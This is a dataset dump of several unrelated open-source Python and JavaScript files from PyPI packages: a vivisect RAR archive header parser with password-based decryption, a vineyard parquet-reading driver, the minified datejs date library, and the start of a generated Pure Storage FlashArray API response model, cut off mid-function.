id
stringlengths 1
8
| text
stringlengths 6
1.05M
| dataset_id
stringclasses 1
value |
---|---|---|
/vivisect-1.1.1-py3-none-any.whl/vstruct/defs/rar.py
|
import os
import sys
import binascii
import vstruct
from vstruct.primitives import *
#HEAD_TYPE_MARKER = 0x72 #marker block
#HEAD_TYPE_ARCHIVE = 0x73 #archive header
#HEAD_TYPE_FILE_HDR = 0x74 #file header
#HEAD_TYPE_OLD_COMMENT = 0x75 #old style comment header
#HEAD_TYPE_OLD_AUTH = 0x76 #old style authenticity information
#HEAD_TYPE_OLD_SUBBLOCK = 0x77 #old style subblock
#HEAD_TYPE_OLD_RECOVERY = 0x78 #old style recovery record
#HEAD_TYPE_OLD_AUTH2 = 0x79 #old style authenticity information
#HEAD_TYPE_SUBBLOCK = 0x7a #subblock
SFX_MODMAX = 1024000 # one meg
RAR4_SIGNATURE = binascii.unhexlify('526172211a0700')
RAR5_SIGNATURE = binascii.unhexlify('526172211a070100')
def getRarOffset(fd):
cur = fd.tell()
head = fd.read(SFX_MODMAX * 2)
fd.seek(cur)
offset = head.find(RAR5_SIGNATURE)
if offset != -1:
return ( (5,0,0), offset + 8 )
offset = head.find(RAR4_SIGNATURE)
if offset != -1:
return ( (4,0,0), offset + 7 )
return None
# Header Types
MARK_HEAD = 0x72
MAIN_HEAD = 0x73
FILE_HEAD = 0x74
COMM_HEAD = 0x75
AV_HEAD = 0x76
SUB_HEAD = 0x77
PROTECT_HEAD = 0x78
SIGN_HEAD = 0x79
NEWSUB_HEAD = 0x7a
ENDARC_HEAD = 0x7b
# Main Header Flags
MHD_VOLUME = 0x0001
MHD_COMMENT = 0x0002
MHD_LOCK = 0x0004
MHD_SOLID = 0x0008
MHD_PACK_COMMENT = 0x0010
MHD_AV = 0x0020
MHD_PROTECT = 0x0040
MHD_PASSWORD = 0x0080 # The archive is password encrypted
MHD_FIRSTVOLUME = 0x0100
MHD_ENCRYPTVER = 0x0200
LHD_SPLIT_BEFORE = 0x0001
LHD_SPLIT_AFTER = 0x0002
LHD_PASSWORD = 0x0004
LHD_COMMENT = 0x0008
LHD_SOLID = 0x0010
LHD_WINDOWMASK = 0x00e0
LHD_WINDOW64 = 0x0000
LHD_WINDOW128 = 0x0020
LHD_WINDOW256 = 0x0040
LHD_WINDOW512 = 0x0060
LHD_WINDOW1024 = 0x0080
LHD_WINDOW2048 = 0x00a0
LHD_WINDOW4096 = 0x00c0
LHD_DIRECTORY = 0x00e0
LHD_LARGE = 0x0100
LHD_UNICODE = 0x0200
LHD_SALT = 0x0400
LHD_VERSION = 0x0800
LHD_EXTTIME = 0x1000
LHD_EXTFLAGS = 0x2000
SKIP_IF_UNKNOWN = 0x4000
LONG_BLOCK = 0x8000
SIZE_SALT30 = 8
SIZE_SALT50 = 16
SIZE_IV = 16
CRYPT_NONE = 0
CRYPT_RAR13 = 1
CRYPT_RAR15 = 2
CRYPT_RAR20 = 3
CRYPT_RAR30 = 4
CRYPT_RAR50 = 5
CRYPT_BLOCKSIZE = 16
class RarChunkUnkn(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.CHUNK_BYTES = v_bytes()
class MainHeader(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.HighPosAV = v_uint16()
self.PosAV = v_uint32()
self.EncryptVer = v_uint8()
#class Rar4BaseBlock
class Rar4Block(vstruct.VStruct):
def __init__(self):
vstruct.VStruct.__init__(self)
self.HEAD_CRC = v_uint16()
self.HEAD_TYPE = v_uint8()
self.HEAD_FLAGS = v_uint16()
self.HEAD_SIZE = v_uint16()
self.HEAD_DATA = vstruct.VStruct()
class MAIN_HEADER(Rar4Block):
def __init__(self):
Rar4Block.__init__(self)
self.HEAD_DATA.HighPosAv = v_uint16()
self.HEAD_DATA.PosAV = v_uint32()
if self.HEAD_FLAGS & MHD_ENCRYPTVER:
self.HEAD_DATA.EncryptVer = v_uint8()
class FILE_HEADER(Rar4Block):
def __init__(self):
Rar4Block.__init__(self)
self.HEAD_DATA.PackSize = v_uint32()
self.HEAD_DATA.UnpSize = v_uint32()
self.HEAD_DATA.HostOs = v_uint8()
self.HEAD_DATA.FileCrc = v_uint32()
self.HEAD_DATA.FileTime = v_uint32()
self.HEAD_DATA.UnpVer = v_uint8()
self.HEAD_DATA.Method = v_uint8()
self.HEAD_DATA.NameSize = v_uint16()
self.HEAD_DATA.FileAttr = v_uint32()
if self.HEAD_FLAGS & LHD_LARGE:
self.HEAD_DATA.HighPackSize = v_uint32()
self.HEAD_DATA.HighUnpSize = v_uint32()
filename = v_str()
self.HEAD_DATA.FileName = filename
if self.HEAD_FLAGS & LHD_SALT:
self.HEAD_DATA.Salt = v_bytes(size=8)
if self.HEAD_FLAGS & LHD_EXTTIME:
raise Exception("FIXME supprort LHD_EXTTIME")
def setFileNameSize(x):
filename.vsSetLength( self.HEAD_DATA.NameSize )
self.HEAD_DATA.vsAddParseCallback('NameSize',setFileNameSize)
#self.HEAD_PAD = vstruct.VStruct()
#self.ADD_SIZE = v_uint32()
#self.BLOCK_DATA = vstruct.VStruct()
#self._known_block = False
#def pcb_HEAD_DATA(self):
#remain = len(self) % 16
#if remain:
#self.HEAD_PAD.pad = v_bytes(size=16-remain)
#def pcb_HEAD_SIZE(self):
#if self.HEAD_TYPE == MAIN_HEAD:
#self.HEAD_DATA.HighPosAv = v_uint16()
#self.HEAD_DATA.PosAV = v_uint32()
#if self.HEAD_FLAGS & MHD_ENCRYPTVER:
#self.HEAD_DATA.EncryptVer = v_uint8()
#return
#if self.HEAD_TYPE == FILE_HEAD:
#self.HEAD_DATA.PackSize = v_uint32()
#self.HEAD_DATA.UnpSize = v_uint32()
#self.HEAD_DATA.HostOs = v_uint8()
#self.HEAD_DATA.FileCrc = v_uint32()
#self.HEAD_DATA.FileTime = v_uint32()
#self.HEAD_DATA.UnpVer = v_uint8()
#self.HEAD_DATA.Method = v_uint8()
#self.HEAD_DATA.NameSize = v_uint16()
#self.HEAD_DATA.FileAttr = v_uint32()
#if self.HEAD_FLAGS & LHD_LARGE:
#self.HEAD_DATA.HighPackSize = v_uint32()
#self.HEAD_DATA.HighUnpSize = v_uint32()
#filename = v_str()
#self.HEAD_DATA.FileName = filename
#if self.HEAD_FLAGS & LHD_SALT:
#self.HEAD_DATA.Salt = v_bytes(size=8)
#if self.HEAD_FLAGS & LHD_EXTTIME:
#raise Exception("FIXME supprort LHD_EXTTIME")
#def setFileNameSize(x):
#filename.vsSetLength( self.HEAD_DATA.NameSize )
#self.HEAD_DATA.vsAddParseCallback('NameSize',setFileNameSize)
#return
#self.HEAD_DATA.NameSize = v_uint32()
#self.HEAD_DATA.NameSize = v_uint32()
#if not self.HEAD_FLAGS & MHD_ENCRYPTVER:
#self.BLOCK_DATA.EncryptVer = vstruct.VStruct()
#def pcb_HEAD_FLAGS(self):
## a proto callback for the header
#if self.HEAD_FLAGS & LONG_BLOCK:
#self.ADD_SIZE = v_uint32()
#else:
#self.ADD_SIZE = vstruct.VStruct()
#if self.HEAD_TYPE == MAIN_HEAD and self.HEAD_FLAGS & MHD_PASSWORD:
#self.BLOCK_DATA.Salt = v_bytes(size=8)
#def pcb_ADD_SIZE(self):
# first things first, needs salt?
#if self.HEAD_FLAGS & MHD_PASSWORD:
#self.BLOCK_DATA.Salt = v_bytes(size=8)
#hsize = 7
#totsize = self.HEAD_SIZE
#
#if not isinstance(self.ADD_SIZE, vstruct.VStruct):
#hsize += 4
#totsize += self.ADD_SIZE
# We will *now* use TYPE to find out our chunk guts
#if not self._known_block:
#self.BLOCK_DATA = v_bytes(totsize - hsize)
import hashlib
rounds = 0x40000
roundsdiv = rounds / 16
#iblist = [ struct.pack('<I',i)[:3] for i in range(rounds) ]
def initIvKey30(passwd,salt):
aesiv = [None] * 16
aeskey = [None] * 16
passb = passwd.encode('utf-16le')
initkey = passb + salt
sha1hash = hashlib.sha1()
#sha1hash = rarsha()
# crazy russian awesomeness/paranoia
for i in range(rounds): # srsly?!?! fscking russians ;)
sha1hash.update(initkey)
ib = struct.pack('<I',i)
sha1hash.update( ib[:3] )
#sha1hash.update( iblist[i] )
if i % roundsdiv == 0:
digest = sha1hash.digest()
#digest = sha1hash.done()
aesiv[ i / roundsdiv ] = digest[-1]
endswap = struct.unpack_from('<4I', sha1hash.digest())
aeskey = struct.pack('>4I', *endswap)
#digest = sha1hash.digest()
#for i in range(4):
#for j in range(4):
#aeskey[ (i*4) + j ] = chr( (digest[i] >> (j*8)) & 0xff )
return ''.join(aesiv), aeskey
def aesInit(iv,key):
from Crypto.Cipher import AES
return AES.new(key, AES.MODE_CBC, iv)
class NoRarFd(Exception):pass
class MissingRarSig(Exception):pass
class PasswordRequired(Exception):pass
rar4blocks = {
FILE_HEAD:FILE_HEADER,
}
class Rar:
def __init__(self, fd=None):
self.fd = None
self.aes = None
self.salt = None
self.offset = None
self.trybuf = None
self.clearbuf = ''
self.version = None
self.mainhead = None
if fd is not None:
self.parseRarHeader(fd)
def parseRarHeader(self, fd):
veroff = getRarOffset(fd)
if veroff is None:
raise MissingRarSig()
self.fd = fd
self.version = veroff[0]
self.offset = veroff[1]
self.fd.seek(self.offset)
self.mainhead = MAIN_HEADER()
self.mainhead.vsParseFd( self.fd )
if self.mainhead.HEAD_FLAGS & MHD_PASSWORD:
self.salt = self.fd.read( SIZE_SALT30 )
def _req_fd(self):
if self.fd is None:
raise NoRarFd()
def tryFilePasswd(self, passwd):
'''
Check the passwd agains the next encrypted header
( which should be of type FILE_HEAD )
'''
if self.trybuf is None:
curloc = self.fd.tell()
self.trybuf = self.fd.read(16)
self.fd.seek(curloc)
iv,key = initIvKey30(passwd,self.salt)
aes = aesInit(iv,key)
clearbuf = aes.decrypt(self.trybuf)
crc,ctype,cflags,csize = struct.unpack_from('<HBHH', clearbuf)
return ctype == FILE_HEAD
def setFilePasswd(self, passwd):
'''
Used to set the file-wide password for decryption.
'''
iv,key = initIvKey30(passwd,self.salt)
self.aes = aesInit(iv,key)
def read(self, size):
if self.aes is None:
return self.fd.read(size)
while len(self.clearbuf) < size:
crypted = self.fd.read(4096)
self.clearbuf += self.aes.decrypt(crypted)
ret = self.clearbuf[:size]
self.clearbuf = self.clearbuf[size:]
return ret
#def read(self, size):
#buf = self.fd.read(size)
#if self.aes is not None:
#buf = self.aes.decrypt(buf)
#return buf
def iterRar4Files(self):
if self.salt is not None and self.aes is None:
raise PasswordRequired()
while True:
hdr = self.read(7)
crc,ctype,cflags,csize = struct.unpack('<HBHH', hdr)
body = self.read(csize - 7)
rar4 = Rar4Block()
rar4.vsParse( hdr )
#if self.salt is not None:
#remain = csize % 16
#if remain:
#pad = self.read( 16 - remain )
#logger.info('PAD %s', binascii.hexlify(pad))
cls = rar4blocks.get(rar4.HEAD_TYPE)
if cls is not None:
rar4 = cls()
rar4.vsParse(hdr+body)
logger.info(rar4.tree())
sys.stdin.readline()
#if ctype == MAIN_HEAD and cflags & MHD_PASSWORD:
#if passwd is None:
#raise PasswordRequired()
#salt30 = fd.read(SIZE_SALT30)
#iv,key = initIvKey(passwd,salt)
#self.aes = aesInit(iv,key)
#break
if ctype == ENDARC_HEAD:
break
#self.HEAD_CRC = v_uint16()
#self.HEAD_TYPE = v_uint8()
#self.HEAD_FLAGS = v_uint16()
#self.HEAD_SIZE = v_uint16()
def main():
# TODO: Does this even work anymore?
offset = 0
with open(sys.argv[1], 'rb') as fd:
testpass = sys.argv[2]
rar = Rar()
rar.parseRarHeader(fd)
rar.mainhead.tree()
#logger.info("FAIL TEST",rar.tryFilePasswd('asdf'))
#logger.info("PASS TEST",rar.tryFilePasswd(testpass))
rar.setFilePasswd(testpass)
rar.iterRar4Files()
#for x in rar.iterRar4Chunks():
#print x
return
buf = fd.read(1024000)
offset = 0
rar4 = Rar4Block()
offset = rar4.vsParse(buf,offset=offset)
print(rar4.tree())
salt = buf[offset:offset+SIZE_SALT30]
print('SALT %s' % binascii.hexlify(salt))
offset += SIZE_SALT30
iv,key = initIvKey30(testpass,salt)
#print('IV %s' % binascii.hexlify(iv))
#print('KEY %s' % binascii.hexlify(key))
aes = aesInit(iv,key)
#print(binascii.hexlify(aes.decrypt(buf[offset:offset+64])))
x = aes.decrypt(buf[offset:offset+64])
rar4 = Rar4Block()
rar4.vsParse(x)
#offset = rar4.vsParse(buf,offset=offset)
print(rar4.tree())
#while offset < len(b):
#r = RarBlock()
#newoff = r.vsParse(b, offset=offset)
#print 'CRC',r.HEAD_CRC,r.HEAD_TYPE
#print r.tree(va=offset)
#offset = newoff
if __name__ == '__main__':
sys.exit(main())
|
PypiClean
|
/vineyard_io-0.16.5-py3-none-any.whl/vineyard/drivers/io/adaptors/read_parquet.py
|
import base64
import json
import logging
import sys
import traceback
from typing import Dict
import cloudpickle
import fsspec
import fsspec.implementations.arrow
from fsspec.core import get_fs_token_paths
import vineyard
from vineyard.data.utils import str_to_bool
from vineyard.io.dataframe import DataframeStream
from vineyard.io.utils import expand_full_path
from vineyard.io.utils import report_error
from vineyard.io.utils import report_exception
from vineyard.io.utils import report_success
logger = logging.getLogger('vineyard')
try:
from vineyard.drivers.io import fsspec_adaptors
except Exception: # pylint: disable=broad-except
logger.warning("Failed to import fsspec adaptors for hdfs, oss, etc.")
def make_empty_batch(schema):
import pyarrow
colmuns = [pyarrow.array([], t) for t in schema.types]
return pyarrow.RecordBatch.from_arrays(colmuns, schema.names)
def read_parquet_blocks(
client, fs, path, read_options, proc_num, proc_index, writer, chunks
):
import pyarrow.parquet
columns = read_options.get('columns', None)
kwargs = {}
if columns:
kwargs['columns'] = columns.split(',')
chunk_hook = read_options.get('chunk_hook', None)
with fs.open(path, 'rb') as f:
reader = pyarrow.parquet.ParquetFile(f)
row_groups_per_proc = reader.num_row_groups // proc_num
if reader.num_row_groups % proc_num != 0:
row_groups_per_proc += 1
row_group_begin = row_groups_per_proc * proc_index
row_group_end = min(
row_groups_per_proc * (proc_index + 1), reader.num_row_groups
)
if row_group_begin < row_group_end:
kwargs = {}
for batch in reader.iter_batches(
row_groups=range(row_group_begin, row_group_end),
use_threads=False,
**kwargs,
):
if chunk_hook is not None:
batch = chunk_hook(batch)
if writer is not None:
writer.write(batch)
else:
chunks.append(client.put(batch.to_pandas(), persist=True))
else:
batch = make_empty_batch(reader.schema_arrow)
if writer is not None:
writer.write(batch)
else:
chunks.append(client.put(batch.to_pandas(), persist=True))
def read_bytes( # noqa: C901, pylint: disable=too-many-statements
vineyard_socket: str,
path: str,
storage_options: Dict,
read_options: Dict,
proc_num: int,
proc_index: int,
accumulate: bool = False,
):
"""Read bytes from external storage and produce a ByteStream,
which will later be assembled into a ParallelStream.
Args:
vineyard_socket (str): Ipc socket
path (str): External storage path to write to
storage_options (dict): Configurations of external storage
read_options (dict): Additional options that could control the
behavior of read
proc_num (int): Total amount of process
proc_index (int): The sequence of this process
Raises:
ValueError: If the stream is invalid.
"""
client = vineyard.connect(vineyard_socket)
params = dict()
# Used when reading tables from external storage.
# Usually for load a property graph
#
# possible values:
#
# - columns, separated by ','
for k, v in read_options.items():
params[k] = v
try:
# files would be empty if it's a glob pattern and globbed nothing.
fs, _, files = get_fs_token_paths(path, storage_options=storage_options)
except Exception: # pylint: disable=broad-except
report_error(
f"Cannot initialize such filesystem for '{path}', "
f"exception is:\n{traceback.format_exc()}"
)
sys.exit(-1)
try:
assert files
except Exception: # pylint: disable=broad-except
report_error(f"Cannot find such files for '{path}'")
sys.exit(-1)
files = sorted(files)
stream, writer, chunks = None, None, []
try:
for index, file_path in enumerate(files):
if index == 0 and not accumulate:
stream = DataframeStream.new(client, {})
client.persist(stream.id)
report_success(stream.id)
writer = stream.open_writer(client)
read_parquet_blocks(
client,
fs,
file_path,
read_options,
proc_num,
proc_index,
writer,
chunks,
)
if writer is not None:
writer.finish()
else:
report_success(json.dumps([repr(vineyard.ObjectID(k)) for k in chunks]))
except Exception: # pylint: disable=broad-except
report_exception()
if writer is not None:
writer.fail()
sys.exit(-1)
def main():
if len(sys.argv) < 7:
print(
"usage: ./read_parquet <ipc_socket> <path> <storage_options> "
"<read_options> <accumulate> <proc_num> <proc_index>"
)
sys.exit(1)
ipc_socket = sys.argv[1]
path = expand_full_path(sys.argv[2])
storage_options = json.loads(
base64.b64decode(sys.argv[3].encode("utf-8")).decode("utf-8")
)
read_options = json.loads(
base64.b64decode(sys.argv[4].encode("utf-8")).decode("utf-8")
)
if 'chunk_hook' in read_options:
read_options['chunk_hook'] = cloudpickle.loads(
base64.b64decode(read_options['chunk_hook'].encode('ascii'))
)
accumulate = str_to_bool(sys.argv[5])
proc_num = int(sys.argv[6])
proc_index = int(sys.argv[7])
read_bytes(
ipc_socket,
path,
storage_options,
read_options,
proc_num,
proc_index,
accumulate=accumulate,
)
if __name__ == "__main__":
main()
|
PypiClean
|
/django-xadmin-0.5.0.tar.gz/django-xadmin-0.5.0/xadmin/static/xadmin/vendor/datejs/build/core.js
|
(function(){var $D=Date,$P=$D.prototype,$C=$D.CultureInfo,p=function(s,l){if(!l){l=2;}
return("000"+s).slice(l*-1);};$P.clearTime=function(){this.setHours(0);this.setMinutes(0);this.setSeconds(0);this.setMilliseconds(0);return this;};$P.setTimeToNow=function(){var n=new Date();this.setHours(n.getHours());this.setMinutes(n.getMinutes());this.setSeconds(n.getSeconds());this.setMilliseconds(n.getMilliseconds());return this;};$D.today=function(){return new Date().clearTime();};$D.compare=function(date1,date2){if(isNaN(date1)||isNaN(date2)){throw new Error(date1+" - "+date2);}else if(date1 instanceof Date&&date2 instanceof Date){return(date1<date2)?-1:(date1>date2)?1:0;}else{throw new TypeError(date1+" - "+date2);}};$D.equals=function(date1,date2){return(date1.compareTo(date2)===0);};$D.getDayNumberFromName=function(name){var n=$C.dayNames,m=$C.abbreviatedDayNames,o=$C.shortestDayNames,s=name.toLowerCase();for(var i=0;i<n.length;i++){if(n[i].toLowerCase()==s||m[i].toLowerCase()==s||o[i].toLowerCase()==s){return i;}}
return-1;};$D.getMonthNumberFromName=function(name){var n=$C.monthNames,m=$C.abbreviatedMonthNames,s=name.toLowerCase();for(var i=0;i<n.length;i++){if(n[i].toLowerCase()==s||m[i].toLowerCase()==s){return i;}}
return-1;};$D.isLeapYear=function(year){return((year%4===0&&year%100!==0)||year%400===0);};$D.getDaysInMonth=function(year,month){return[31,($D.isLeapYear(year)?29:28),31,30,31,30,31,31,30,31,30,31][month];};$D.getTimezoneAbbreviation=function(offset){var z=$C.timezones,p;for(var i=0;i<z.length;i++){if(z[i].offset===offset){return z[i].name;}}
return null;};$D.getTimezoneOffset=function(name){var z=$C.timezones,p;for(var i=0;i<z.length;i++){if(z[i].name===name.toUpperCase()){return z[i].offset;}}
return null;};$P.clone=function(){return new Date(this.getTime());};$P.compareTo=function(date){return Date.compare(this,date);};$P.equals=function(date){return Date.equals(this,date||new Date());};$P.between=function(start,end){return this.getTime()>=start.getTime()&&this.getTime()<=end.getTime();};$P.isAfter=function(date){return this.compareTo(date||new Date())===1;};$P.isBefore=function(date){return(this.compareTo(date||new Date())===-1);};$P.isToday=function(){return this.isSameDay(new Date());};$P.isSameDay=function(date){return this.clone().clearTime().equals(date.clone().clearTime());};$P.addMilliseconds=function(value){this.setMilliseconds(this.getMilliseconds()+value);return this;};$P.addSeconds=function(value){return this.addMilliseconds(value*1000);};$P.addMinutes=function(value){return this.addMilliseconds(value*60000);};$P.addHours=function(value){return this.addMilliseconds(value*3600000);};$P.addDays=function(value){this.setDate(this.getDate()+value);return this;};$P.addWeeks=function(value){return this.addDays(value*7);};$P.addMonths=function(value){var n=this.getDate();this.setDate(1);this.setMonth(this.getMonth()+value);this.setDate(Math.min(n,$D.getDaysInMonth(this.getFullYear(),this.getMonth())));return this;};$P.addYears=function(value){return this.addMonths(value*12);};$P.add=function(config){if(typeof config=="number"){this._orient=config;return this;}
var x=config;if(x.milliseconds){this.addMilliseconds(x.milliseconds);}
if(x.seconds){this.addSeconds(x.seconds);}
if(x.minutes){this.addMinutes(x.minutes);}
if(x.hours){this.addHours(x.hours);}
if(x.weeks){this.addWeeks(x.weeks);}
if(x.months){this.addMonths(x.months);}
if(x.years){this.addYears(x.years);}
if(x.days){this.addDays(x.days);}
return this;};var $y,$m,$d;$P.getWeek=function(){var a,b,c,d,e,f,g,n,s,w;$y=(!$y)?this.getFullYear():$y;$m=(!$m)?this.getMonth()+1:$m;$d=(!$d)?this.getDate():$d;if($m<=2){a=$y-1;b=(a/4|0)-(a/100|0)+(a/400|0);c=((a-1)/4|0)-((a-1)/100|0)+((a-1)/400|0);s=b-c;e=0;f=$d-1+(31*($m-1));}else{a=$y;b=(a/4|0)-(a/100|0)+(a/400|0);c=((a-1)/4|0)-((a-1)/100|0)+((a-1)/400|0);s=b-c;e=s+1;f=$d+((153*($m-3)+2)/5)+58+s;}
g=(a+b)%7;d=(f+g-e)%7;n=(f+3-d)|0;if(n<0){w=53-((g-s)/5|0);}else if(n>364+s){w=1;}else{w=(n/7|0)+1;}
$y=$m=$d=null;return w;};$P.getISOWeek=function(){$y=this.getUTCFullYear();$m=this.getUTCMonth()+1;$d=this.getUTCDate();return p(this.getWeek());};$P.setWeek=function(n){return this.moveToDayOfWeek(1).addWeeks(n-this.getWeek());};$D._validate=function(n,min,max,name){if(typeof n=="undefined"){return false;}else if(typeof n!="number"){throw new TypeError(n+" is not a Number.");}else if(n<min||n>max){throw new RangeError(n+" is not a valid value for "+name+".");}
return true;};$D.validateMillisecond=function(value){return $D._validate(value,0,999,"millisecond");};$D.validateSecond=function(value){return $D._validate(value,0,59,"second");};$D.validateMinute=function(value){return $D._validate(value,0,59,"minute");};$D.validateHour=function(value){return $D._validate(value,0,23,"hour");};$D.validateDay=function(value,year,month){return $D._validate(value,1,$D.getDaysInMonth(year,month),"day");};$D.validateMonth=function(value){return $D._validate(value,0,11,"month");};$D.validateYear=function(value){return $D._validate(value,0,9999,"year");};$P.set=function(config){if($D.validateMillisecond(config.millisecond)){this.addMilliseconds(config.millisecond-this.getMilliseconds());}
if($D.validateSecond(config.second)){this.addSeconds(config.second-this.getSeconds());}
if($D.validateMinute(config.minute)){this.addMinutes(config.minute-this.getMinutes());}
if($D.validateHour(config.hour)){this.addHours(config.hour-this.getHours());}
if($D.validateMonth(config.month)){this.addMonths(config.month-this.getMonth());}
if($D.validateYear(config.year)){this.addYears(config.year-this.getFullYear());}
if($D.validateDay(config.day,this.getFullYear(),this.getMonth())){this.addDays(config.day-this.getDate());}
if(config.timezone){this.setTimezone(config.timezone);}
if(config.timezoneOffset){this.setTimezoneOffset(config.timezoneOffset);}
if(config.week&&$D._validate(config.week,0,53,"week")){this.setWeek(config.week);}
return this;};$P.moveToFirstDayOfMonth=function(){return this.set({day:1});};$P.moveToLastDayOfMonth=function(){return this.set({day:$D.getDaysInMonth(this.getFullYear(),this.getMonth())});};$P.moveToNthOccurrence=function(dayOfWeek,occurrence){var shift=0;if(occurrence>0){shift=occurrence-1;}
else if(occurrence===-1){this.moveToLastDayOfMonth();if(this.getDay()!==dayOfWeek){this.moveToDayOfWeek(dayOfWeek,-1);}
return this;}
return this.moveToFirstDayOfMonth().addDays(-1).moveToDayOfWeek(dayOfWeek,+1).addWeeks(shift);};$P.moveToDayOfWeek=function(dayOfWeek,orient){var diff=(dayOfWeek-this.getDay()+7*(orient||+1))%7;return this.addDays((diff===0)?diff+=7*(orient||+1):diff);};$P.moveToMonth=function(month,orient){var diff=(month-this.getMonth()+12*(orient||+1))%12;return this.addMonths((diff===0)?diff+=12*(orient||+1):diff);};$P.getOrdinalNumber=function(){return Math.ceil((this.clone().clearTime()-new Date(this.getFullYear(),0,1))/86400000)+1;};$P.getTimezone=function(){return $D.getTimezoneAbbreviation(this.getUTCOffset());};$P.setTimezoneOffset=function(offset){var here=this.getTimezoneOffset(),there=Number(offset)*-6/10;return this.addMinutes(there-here);};$P.setTimezone=function(offset){return this.setTimezoneOffset($D.getTimezoneOffset(offset));};$P.hasDaylightSavingTime=function(){return(Date.today().set({month:0,day:1}).getTimezoneOffset()!==Date.today().set({month:6,day:1}).getTimezoneOffset());};$P.isDaylightSavingTime=function(){return(this.hasDaylightSavingTime()&&new Date().getTimezoneOffset()===Date.today().set({month:6,day:1}).getTimezoneOffset());};$P.getUTCOffset=function(){var n=this.getTimezoneOffset()*-10/6,r;if(n<0){r=(n-10000).toString();return r.charAt(0)+r.substr(2);}else{r=(n+10000).toString();return"+"+r.substr(1);}};$P.getElapsed=function(date){return(date||new Date())-this;};if(!$P.toISOString){$P.toISOString=function(){function f(n){return n<10?'0'+n:n;}
return'"'+this.getUTCFullYear()+'-'+
f(this.getUTCMonth()+1)+'-'+
f(this.getUTCDate())+'T'+
f(this.getUTCHours())+':'+
f(this.getUTCMinutes())+':'+
f(this.getUTCSeconds())+'Z"';};}
$P._toString=$P.toString;$P.toString=function(format){var x=this;if(format&&format.length==1){var c=$C.formatPatterns;x.t=x.toString;switch(format){case"d":return x.t(c.shortDate);case"D":return x.t(c.longDate);case"F":return x.t(c.fullDateTime);case"m":return x.t(c.monthDay);case"r":return x.t(c.rfc1123);case"s":return x.t(c.sortableDateTime);case"t":return x.t(c.shortTime);case"T":return x.t(c.longTime);case"u":return x.t(c.universalSortableDateTime);case"y":return x.t(c.yearMonth);}}
var ord=function(n){switch(n*1){case 1:case 21:case 31:return"st";case 2:case 22:return"nd";case 3:case 23:return"rd";default:return"th";}};return format?format.replace(/(\\)?(dd?d?d?|MM?M?M?|yy?y?y?|hh?|HH?|mm?|ss?|tt?|S)/g,function(m){if(m.charAt(0)==="\\"){return m.replace("\\","");}
x.h=x.getHours;switch(m){case"hh":return p(x.h()<13?(x.h()===0?12:x.h()):(x.h()-12));case"h":return x.h()<13?(x.h()===0?12:x.h()):(x.h()-12);case"HH":return p(x.h());case"H":return x.h();case"mm":return p(x.getMinutes());case"m":return x.getMinutes();case"ss":return p(x.getSeconds());case"s":return x.getSeconds();case"yyyy":return p(x.getFullYear(),4);case"yy":return p(x.getFullYear());case"dddd":return $C.dayNames[x.getDay()];case"ddd":return $C.abbreviatedDayNames[x.getDay()];case"dd":return p(x.getDate());case"d":return x.getDate();case"MMMM":return $C.monthNames[x.getMonth()];case"MMM":return $C.abbreviatedMonthNames[x.getMonth()];case"MM":return p((x.getMonth()+1));case"M":return x.getMonth()+1;case"t":return x.h()<12?$C.amDesignator.substring(0,1):$C.pmDesignator.substring(0,1);case"tt":return x.h()<12?$C.amDesignator:$C.pmDesignator;case"S":return ord(x.getDate());default:return m;}}):this._toString();};}());
|
PypiClean
|
/py-pure-client-1.38.0.tar.gz/py-pure-client-1.38.0/pypureclient/flasharray/FA_2_9/models/resource_performance_no_id_by_array_get_response.py
|
import pprint
import re
import six
import typing
from ....properties import Property
if typing.TYPE_CHECKING:
from pypureclient.flasharray.FA_2_9 import models
class ResourcePerformanceNoIdByArrayGetResponse(object):
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'more_items_remaining': 'bool',
'total_item_count': 'int',
'continuation_token': 'str',
'items': 'list[ResourcePerformanceNoIdByArray]',
'total': 'list[ResourcePerformanceNoIdByArray]'
}
attribute_map = {
'more_items_remaining': 'more_items_remaining',
'total_item_count': 'total_item_count',
'continuation_token': 'continuation_token',
'items': 'items',
'total': 'total'
}
required_args = {
}
def __init__(
self,
more_items_remaining=None, # type: bool
total_item_count=None, # type: int
continuation_token=None, # type: str
items=None, # type: List[models.ResourcePerformanceNoIdByArray]
total=None, # type: List[models.ResourcePerformanceNoIdByArray]
):
"""
Keyword args:
more_items_remaining (bool): Returns a value of `true` if subsequent items can be retrieved.
total_item_count (int): The total number of records after applying all filter query parameters. The `total_item_count` will be calculated if and only if the corresponding query parameter `total_item_count` is set to `true`. If this query parameter is not set or set to `false`, a value of `null` will be returned.
continuation_token (str): Continuation token that can be provided in the `continuation_token` query param to get the next page of data. If you use the continuation token to page through data you are guaranteed to get all items exactly once regardless of how items are modified. If an item is added or deleted during the pagination then it may or may not be returned. The continuation token is generated if the limit is less than the remaining number of items, and the default sort is used (no sort is specified).
items (list[ResourcePerformanceNoIdByArray]): Performance data, broken down by array. If `total_only=true`, the `items` list will be empty.
total (list[ResourcePerformanceNoIdByArray]): The aggregate value of all items after filtering. Where it makes more sense, the average value is displayed instead. The values are displayed for each field where meaningful.
"""
if more_items_remaining is not None:
self.more_items_remaining = more_items_remaining
if total_item_count is not None:
self.total_item_count = total_item_count
if continuation_token is not None:
self.continuation_token = continuation_token
if items is not None:
self.items = items
if total is not None:
self.total = total
def __setattr__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ResourcePerformanceNoIdByArrayGetResponse`".format(key))
self.__dict__[key] = value
def __getattribute__(self, item):
value = object.__getattribute__(self, item)
if isinstance(value, Property):
raise AttributeError
else:
return value
def __getitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ResourcePerformanceNoIdByArrayGetResponse`".format(key))
return object.__getattribute__(self, key)
def __setitem__(self, key, value):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ResourcePerformanceNoIdByArrayGetResponse`".format(key))
object.__setattr__(self, key, value)
def __delitem__(self, key):
if key not in self.attribute_map:
raise KeyError("Invalid key `{}` for `ResourcePerformanceNoIdByArrayGetResponse`".format(key))
object.__delattr__(self, key)
def keys(self):
return self.attribute_map.keys()
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
if hasattr(self, attr):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
